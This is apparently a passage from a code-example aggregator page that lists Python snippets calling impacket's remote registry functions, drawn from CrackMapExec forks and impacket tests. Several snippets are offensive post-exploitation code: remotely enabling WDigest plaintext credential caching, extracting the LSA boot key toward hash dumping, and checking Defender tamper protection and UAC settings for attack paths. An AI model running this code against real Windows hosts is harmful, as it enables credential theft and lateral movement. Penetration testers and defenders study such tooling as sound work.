            lmhash = ''
            nthash = ''
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.username, self.password,
                                         self.domain, lmhash, nthash)
        dce = rpctransport.get_dce_rpc()
        #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
        dce.connect()
        dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax=self.ts)
        resp = rrp.hOpenLocalMachine(
            dce,
            MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)

        return dce, rpctransport, resp['phKey']

Exemplo n.º 29

Arquivo: wdigest.py Projeto: zyayaa/CrackMapExec

    def wdigest_disable(self, context, smbconnection):
        remoteOps = RemoteOperations(smbconnection, False)
        remoteOps.enableRegistry()

        if remoteOps._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(
                remoteOps._RemoteOperations__rrp, regHandle,
                'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
            )
            keyHandle = ans['phkResult']

            try:
                rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp,
                                        keyHandle, 'UseLogonCredential\x00')
            except:
                context.log.success(
                    'UseLogonCredential registry key not present')

                try:
                    remoteOps.finish()
                except:
                    pass

                return

            try:
                #Check to make sure the reg key is actually deleted
                rtype, data = rrp.hBaseRegQueryValue(
                    remoteOps._RemoteOperations__rrp, keyHandle,
                    'UseLogonCredential\x00')
            except DCERPCException:
                context.log.success(
                    'UseLogonCredential registry key deleted successfully')

                try:
                    remoteOps.finish()
                except:
                    pass

Exemplo n.º 30

Arquivo: remoteoperations.py Projeto: AnyMaster/CrackMapExec

    def getBootKey(self):
        bootKey = ''
        ans = rrp.hOpenLocalMachine(self.__rrp)
        self.__regHandle = ans['phKey']
        for key in ['JD','Skew1','GBG','Data']:
            logging.debug('Retrieving class info for %s'% key)
            ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa\\%s' % key)
            keyHandle = ans['phkResult']
            ans = rrp.hBaseRegQueryInfoKey(self.__rrp,keyHandle)
            bootKey = bootKey + ans['lpClassOut'][:-1]
            rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

        transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]

        bootKey = unhexlify(bootKey)

        for i in xrange(len(bootKey)):
            self.__bootKey += bootKey[transforms[i]]

        logging.info('Target system bootKey: 0x%s' % hexlify(self.__bootKey))

        return self.__bootKey

Exemplo n.º 31

Arquivo: wdigest.py Projeto: 0xe7/CrackMapExec

    def wdigest_enable(self, context, smbconnection):
        remoteOps = RemoteOperations(smbconnection, False)
        remoteOps.enableRegistry()

        if remoteOps._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00',  rrp.REG_DWORD, 1)

            rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')

            if int(data) == 1:
                context.log.success('UseLogonCredential registry key created successfully')

        try:
            remoteOps.finish()
        except:
            pass

Exemplo n.º 32

Arquivo: wdigest.py Projeto: AnyMaster/CrackMapExec

    def enable(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        self.rrp = remoteOps._RemoteOperations__rrp

        if self.rrp is not None:
            ans = rrp.hOpenLocalMachine(self.rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00',  rrp.REG_DWORD, '\x01\x00')

            rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')

            if int(data) == 1:
                self.logger.success('UseLogonCredential registry key created successfully')

        try:
            remoteOps.finish()
        except:
            pass

Exemplo n.º 33

Arquivo: reg.py Projeto: timmytr1ll/CrackMapExtreme

    def checkTamper(self, dce):
        #
        try:
            ans = rrp.hOpenLocalMachine(
                dce)  # gets handle for HKEY_LOCAL_MACHINE
            regHandle = ans['phKey']
        except Exception as e:
            logging.debug('Exception thrown when hOpenLocalMachine: %s',
                          str(e))
            return

        try:
            resp = rrp.hBaseRegCreateKey(
                dce, regHandle,
                'SOFTWARE\\Microsoft\\Windows Defender\\Features')
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s',
                          str(e))
            return

        # TamperProtection
        try:
            dataType, tp_value = rrp.hBaseRegQueryValue(
                dce, keyHandle, 'TamperProtection')
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegQueryValue: %s',
                          str(e))
            tp_value = 5
            pass

        if tp_value == 5:
            self.logger.highlight('TamperProtection = 5  (its on)   ')
        else:
            self.logger.highlight(
                'TamperProtection = {}  (less than 5 is good)'.format(
                    tp_value))

Exemplo n.º 34

Arquivo: test_rrp.py Projeto: awesome-security/impacket

    def connect(self):
        if self.rrpStarted is not True:
            dce, rpctransport, scHandle = self.connect_scmr()

            desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \
                            scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS

            resp = scmr.hROpenServiceW(dce, scHandle, 'RemoteRegistry\x00', desiredAccess)
            resp.dump()
            serviceHandle = resp['lpServiceHandle']

            try:
                resp = scmr.hRStartServiceW(dce, serviceHandle )
            except Exception as e:
                if str(e).find('ERROR_SERVICE_ALREADY_RUNNING') >=0:
                    pass
                else:
                    raise
            resp = scmr.hRCloseServiceHandle(dce, scHandle)
            self.rrpStarted = True

        rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
        if len(self.hashes) > 0:
            lmhash, nthash = self.hashes.split(':')
        else:
            lmhash = ''
            nthash = ''
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.username,self.password, self.domain, lmhash, nthash)
        dce = rpctransport.get_dce_rpc()
        #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
        dce.connect()
        dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax = self.ts)
        resp = rrp.hOpenLocalMachine(dce, MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)

        return dce, rpctransport, resp['phKey']

Exemplo n.º 35

Arquivo: reg.py Projeto: timmytr1ll/CrackMapExtreme

    def checkUAC(self, dce):
        #
        try:
            ans = rrp.hOpenLocalMachine(dce)
            regHandle = ans['phKey']
        except Exception as e:
            logging.debug('Exception thrown when hOpenLocalMachine: %s',
                          str(e))
            return

        self.logger.highlight('UAC Status:')

        try:
            resp = rrp.hBaseRegOpenKey(
                dce, regHandle,
                'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
            )
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegOpenKey: %s', str(e))
            return

        #EnableLUA
        try:
            dataType, lua_uac_value = rrp.hBaseRegQueryValue(
                dce, keyHandle, 'EnableLUA')
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegQueryValue: %s',
                          str(e))
            lua_uac_value = 3
            pass
        #LocalAccountTokenFilterPolicy
        try:
            dataType, latfp_uac_value = rrp.hBaseRegQueryValue(
                dce, keyHandle, 'LocalAccountTokenFilterPolicy')
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegQueryValue: %s',
                          str(e))
            latfp_uac_value = 3
            pass
        #LocalAccountTokenFilterPolicy
        try:
            dataType, fat_uac_value = rrp.hBaseRegQueryValue(
                dce, keyHandle, 'FilterAdministratorToken')
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegQueryValue: %s',
                          str(e))
            fat_uac_value = 3
            pass

    #Results
        if lua_uac_value == 1:
            self.logger.highlight('    enableLua = 1  (default)   ')
        elif lua_uac_value == 0:
            self.logger.highlight('    enableLua = 0')
        else:
            self.logger.highlight('     enableLua key does not exist!')

        if latfp_uac_value == 1:
            self.logger.highlight('    LocalAccountTokenFilterPolicy = 1')
        elif latfp_uac_value == 0:
            self.logger.highlight(
                '    LocalAccountTokenFilterPolicy = 0  (default)')
        else:
            self.logger.highlight(
                '    LocalAccountTokenFilterPolicy key does not exist!')

        if fat_uac_value == 1:
            self.logger.highlight('    FilterAdministratorToken = 1    ')
        elif fat_uac_value == 0:
            self.logger.highlight('    FilterAdministratorToken = 0 (default)')
        else:
            self.logger.highlight(
                '    FilterAdministratorToken key does not exist!')

    # Analysis
        self.logger.highlight('')
        self.logger.highlight('UAC Analysis:')
        if lua_uac_value == 1:
            self.logger.highlight(
                'EnableLUA current setting means capabilities are determined by'
            )
            self.logger.highlight(
                '         LocalAccountTokenFilterPolicy and/or FilterAdministratorToken'
            )
            self.logger.highlight('')
        elif lua_uac_value == 0:
            self.logger.highlight(
                'High integrity access available to any member of the local admins group'
            )
            self.logger.highlight(
                '           using plaintext credentials or password hashes!')
            return

        if latfp_uac_value == 1:
            self.logger.highlight(
                'LocalAccountTokenFilterPolicy configured to allow remote connections with high integrity access tokens!'
            )
            return
        else:
            self.logger.highlight(
                'LocalAccountTokenFilterPolicy set to 0 tells us:')
            self.logger.highlight(
                '    High integrity access only possible using either the plaintext pass'
            )
            self.logger.highlight(
                '    or password hash of the RID 500 local administrator')
            self.logger.highlight('')

        if fat_uac_value == 1:
            self.logger.highlight(
                'FilterAdministratorToken set to 1 tells us High integrity access not available for RID 500 local administrator'
            )
        else:  # 0 or missing
            self.logger.highlight(
                'The FilterAdministratorToken setting should have no effect in this case'
            )

Exemplo n.º 36

Arquivo: test_rrp.py Projeto: zjx-ERROR/impacket

 def open_local_machine(self, dce):
     resp = rrp.hOpenLocalMachine(
         dce,
         MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)
     return resp['phKey']